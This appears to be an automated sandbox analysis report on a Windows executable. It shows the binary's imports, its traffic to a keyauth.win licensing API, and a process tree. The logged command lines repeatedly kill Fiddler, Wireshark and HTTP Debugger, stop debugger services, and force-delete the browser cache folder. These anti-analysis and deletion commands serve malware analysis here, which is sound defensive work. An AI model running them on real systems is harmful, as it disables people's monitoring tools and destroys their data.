                                      MSVCP140.dll?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?_Xlength_error@std@@YAXPEBD@Z, _Thrd_detach, _Cnd_do_broadcast_at_thread_exit, ?_Throw_Cpp_error@std@@YAXH@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z, ?_Random_device@std@@YAIXZ, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?_Xbad_function_call@std@@YAXXZ, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z
                                      urlmon.dllURLDownloadToFileA
                                      Normaliz.dllIdnToAscii
                                      WLDAP32.dll
                                      CRYPT32.dllCertFreeCertificateChain, CertGetCertificateChain, CertFreeCertificateChainEngine, CertCreateCertificateChainEngine, CryptQueryObject, CertGetNameStringA, CertFindExtension, CertAddCertificateContextToStore, CryptDecodeObjectEx, PFXImportCertStore, CryptStringToBinaryA, CertFreeCertificateContext, CertFindCertificateInStore, CertEnumCertificatesInStore, CertOpenStore, CertCloseStore
                                      WS2_32.dllntohl, gethostname, sendto, recvfrom, freeaddrinfo, getaddrinfo, select, __WSAFDIsSet, ioctlsocket, htonl, accept, WSACleanup, WSAStartup, WSAIoctl, WSASetLastError, socket, setsockopt, ntohs, htons, getsockopt, getsockname, getpeername, connect, bind, WSAGetLastError, send, recv, closesocket, listen
                                      VCRUNTIME140.dll__std_exception_destroy, __std_exception_copy, memcpy, memcmp, _CxxThrowException, __std_terminate, __C_specific_handler, strchr, __current_exception_context, strrchr, __current_exception, memchr, memset, strstr, memmove
                                      VCRUNTIME140_1.dll__CxxFrameHandler4
                                      api-ms-win-crt-runtime-l1-1-0.dll_errno, __sys_nerr, _invalid_parameter_noinfo_noreturn, strerror, exit, _getpid, system, _beginthreadex, _register_thread_local_exe_atexit_callback, terminate, _configure_narrow_argv, _initialize_narrow_environment, _initialize_onexit_table, _register_onexit_function, _crt_atexit, _cexit, _seh_filter_exe, _set_app_type, _c_exit, _get_initial_narrow_environment, _initterm, _initterm_e, _exit, __p___argv, __p___argc
                                      api-ms-win-crt-heap-l1-1-0.dll_callnewh, calloc, realloc, malloc, _set_new_mode, free
                                      api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vfprintf, fseek, feof, __p__commode, fputc, ftell, _lseeki64, _read, _write, _close, _open, __acrt_iob_func, __stdio_common_vsscanf, fgets, fputs, fopen, fflush, __stdio_common_vsprintf, fread, fclose, _set_fmode, fwrite
                                      api-ms-win-crt-convert-l1-1-0.dllatoi, strtoul, strtoull, strtoll, strtol, strtod
                                      api-ms-win-crt-locale-l1-1-0.dlllocaleconv, _configthreadlocale
                                      api-ms-win-crt-time-l1-1-0.dll_time64, _gmtime64
                                      api-ms-win-crt-string-l1-1-0.dllstrpbrk, strcspn, strcmp, strncmp, strncpy, strspn, isupper, tolower, _strdup
                                      api-ms-win-crt-utility-l1-1-0.dllqsort
                                      api-ms-win-crt-filesystem-l1-1-0.dll_stat64, _access, _unlink, _fstat64
                                      api-ms-win-crt-math-l1-1-0.dll__setusermatherr, _dclass
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 14, 2025 16:45:23.709136009 CET49760443192.168.2.9104.26.1.5
                                      Jan 14, 2025 16:45:23.709177971 CET44349760104.26.1.5192.168.2.9
                                      Jan 14, 2025 16:45:23.709235907 CET49760443192.168.2.9104.26.1.5
                                      Jan 14, 2025 16:45:23.722959042 CET49760443192.168.2.9104.26.1.5
                                      Jan 14, 2025 16:45:23.722982883 CET44349760104.26.1.5192.168.2.9
                                      Jan 14, 2025 16:45:24.197211027 CET44349760104.26.1.5192.168.2.9
                                      Jan 14, 2025 16:45:24.197279930 CET49760443192.168.2.9104.26.1.5
                                      Jan 14, 2025 16:45:24.200678110 CET49760443192.168.2.9104.26.1.5
                                      Jan 14, 2025 16:45:24.200687885 CET44349760104.26.1.5192.168.2.9
                                      Jan 14, 2025 16:45:24.200999022 CET44349760104.26.1.5192.168.2.9
                                      Jan 14, 2025 16:45:24.203989983 CET49760443192.168.2.9104.26.1.5
                                      Jan 14, 2025 16:45:24.251326084 CET44349760104.26.1.5192.168.2.9
                                      Jan 14, 2025 16:45:24.395649910 CET44349760104.26.1.5192.168.2.9
                                      Jan 14, 2025 16:45:24.395735025 CET44349760104.26.1.5192.168.2.9
                                      Jan 14, 2025 16:45:24.395788908 CET49760443192.168.2.9104.26.1.5
                                      Jan 14, 2025 16:45:24.407567978 CET49760443192.168.2.9104.26.1.5
                                      Jan 14, 2025 16:45:24.407581091 CET44349760104.26.1.5192.168.2.9
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 14, 2025 16:45:23.696974993 CET5914353192.168.2.91.1.1.1
                                      Jan 14, 2025 16:45:23.704163074 CET53591431.1.1.1192.168.2.9
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jan 14, 2025 16:45:23.696974993 CET192.168.2.91.1.1.10xc759Standard query (0)keyauth.winA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jan 14, 2025 16:45:23.704163074 CET1.1.1.1192.168.2.90xc759No error (0)keyauth.win104.26.1.5A (IP address)IN (0x0001)false
                                      Jan 14, 2025 16:45:23.704163074 CET1.1.1.1192.168.2.90xc759No error (0)keyauth.win104.26.0.5A (IP address)IN (0x0001)false
                                      Jan 14, 2025 16:45:23.704163074 CET1.1.1.1192.168.2.90xc759No error (0)keyauth.win172.67.72.57A (IP address)IN (0x0001)false
                                      • keyauth.win
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.949760104.26.1.54433852C:\Users\user\Desktop\PlusPrivStoreAtt116.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-14 15:45:24 UTC128OUTPOST /api/1.1/ HTTP/1.1
                                      Host: keyauth.win
                                      Accept: */*
                                      Content-Length: 74
                                      Content-Type: application/x-www-form-urlencoded
                                      2025-01-14 15:45:24 UTC74OUTData Raw: 74 79 70 65 3d 69 6e 69 74 26 76 65 72 3d 32 2e 36 26 6e 61 6d 65 3d 4c 6f 61 64 65 72 20 50 72 69 6e 63 69 70 61 6c 20 7c 20 50 72 69 76 61 74 65 20 53 74 6f 72 65 26 6f 77 6e 65 72 69 64 3d 39 57 49 76 54 56 4a 61 39 6d
                                      Data Ascii: type=init&ver=2.6&name=Loader Principal | Private Store&ownerid=9WIvTVJa9m
                                      2025-01-14 15:45:24 UTC1320INHTTP/1.1 200 OK
                                      Date: Tue, 14 Jan 2025 15:45:24 GMT
                                      Content-Type: application/json; charset=UTF-8
                                      Content-Length: 475
                                      Connection: close
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KC0G2Ru5e1WNnkFS%2BUKvodWzWAjkec3TPBQ8agJGJKj95AIsrwU14AORNW9NJGndKqBt95xSxHl7Y0wGRN5r6Aig6fu0on7zCxM6J%2BRl2BAoOD6kplLfc2OEsR6R"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Acknowledge: Credit to VaultCord.com
                                      X-Powered-By: VaultCord.com
                                      content-security-policy: upgrade-insecure-requests
                                      permissions-policy: accelerometer=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                      referrer-policy: strict-origin-when-cross-origin
                                      strict-transport-security: max-age=31536000; includeSubDomains
                                      x-content-security-policy: img-src *; media-src * data:;
                                      x-content-type-options: nosniff
                                      x-frame-options: DENY
                                      x-xss-protection: 1; mode=block
                                      Access-Control-Allow-Headers: *
                                      Access-Control-Allow-Methods: *
                                      Access-Control-Allow-Origin: *
                                      Server: cloudflare
                                      CF-RAY: 901ec0bec8fb8c89-EWR
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2106&min_rtt=2085&rtt_var=797&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2344&recv_bytes=862&delivery_rate=1400479&cwnd=202&unsent_bytes=0&cid=93cee7331e3a2f2e&ts=208&x=0"
                                      2025-01-14 15:45:24 UTC49INData Raw: 7b 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 63 6f 64 65 22 3a 36 38 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 69 74 69 61 6c 69 7a 65 64 22
                                      Data Ascii: {"success":true,"code":68,"message":"Initialized"
                                      2025-01-14 15:45:24 UTC426INData Raw: 2c 22 73 65 73 73 69 6f 6e 69 64 22 3a 22 30 33 34 61 38 38 64 38 22 2c 22 61 70 70 69 6e 66 6f 22 3a 7b 22 6e 75 6d 55 73 65 72 73 22 3a 22 4e 2f 41 20 2d 20 55 73 65 20 66 65 74 63 68 53 74 61 74 73 28 29 20 66 75 6e 63 74 69 6f 6e 20 69 6e 20 6c 61 74 65 73 74 20 65 78 61 6d 70 6c 65 22 2c 22 6e 75 6d 4f 6e 6c 69 6e 65 55 73 65 72 73 22 3a 22 4e 2f 41 20 2d 20 55 73 65 20 66 65 74 63 68 53 74 61 74 73 28 29 20 66 75 6e 63 74 69 6f 6e 20 69 6e 20 6c 61 74 65 73 74 20 65 78 61 6d 70 6c 65 22 2c 22 6e 75 6d 4b 65 79 73 22 3a 22 4e 2f 41 20 2d 20 55 73 65 20 66 65 74 63 68 53 74 61 74 73 28 29 20 66 75 6e 63 74 69 6f 6e 20 69 6e 20 6c 61 74 65 73 74 20 65 78 61 6d 70 6c 65 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 36 22 2c 22 63 75 73 74 6f 6d 65 72 50
                                      Data Ascii: ,"sessionid":"034a88d8","appinfo":{"numUsers":"N/A - Use fetchStats() function in latest example","numOnlineUsers":"N/A - Use fetchStats() function in latest example","numKeys":"N/A - Use fetchStats() function in latest example","version":"2.6","customerP


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:10:45:20
                                      Start date:14/01/2025
                                      Path:C:\Users\user\Desktop\PlusPrivStoreAtt116.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\PlusPrivStoreAtt116.exe"
                                      Imagebase:0x7ff6029a0000
                                      File size:510'464 bytes
                                      MD5 hash:D4A125241862EB0A4BD1AFCF362D914F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:false

                                      Target ID:1
                                      Start time:10:45:20
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff70f010000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:3
                                      Start time:10:45:20
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:10:45:20
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                      Imagebase:0x7ff79e3d0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:5
                                      Start time:10:45:20
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:10:45:20
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
                                      Imagebase:0x7ff79e3d0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:7
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                      Imagebase:0x7ff79e3d0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:9
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop HTTPDebuggerPro
                                      Imagebase:0x7ff629830000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:12
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop HTTPDebuggerProSdk
                                      Imagebase:0x7ff70f010000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:13
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:14
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:15
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                      Imagebase:0x7ff79e3d0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:16
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
                                      Imagebase:0x7ff79e3d0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:10:45:21
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                      Imagebase:0x7ff79e3d0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:10:45:22
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:10:45:22
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop HTTPDebuggerPro
                                      Imagebase:0x7ff629830000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:10:45:22
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:10:45:22
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop HTTPDebuggerProSdk
                                      Imagebase:0x7ff629830000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:10:45:22
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:10:45:23
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:10:45:23
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                      Imagebase:0x7ff79e3d0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:10:45:23
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:10:45:23
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
                                      Imagebase:0x7ff79e3d0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:10:45:24
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:10:45:24
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                      Imagebase:0x7ff79e3d0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:10:45:24
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:10:45:24
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop HTTPDebuggerPro
                                      Imagebase:0x7ff629830000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:10:45:24
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:10:45:24
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop HTTPDebuggerProSdk
                                      Imagebase:0x7ff629830000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:10:45:24
                                      Start date:14/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
                                      Imagebase:0x7ff716840000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:4.9%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:21.7%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:98
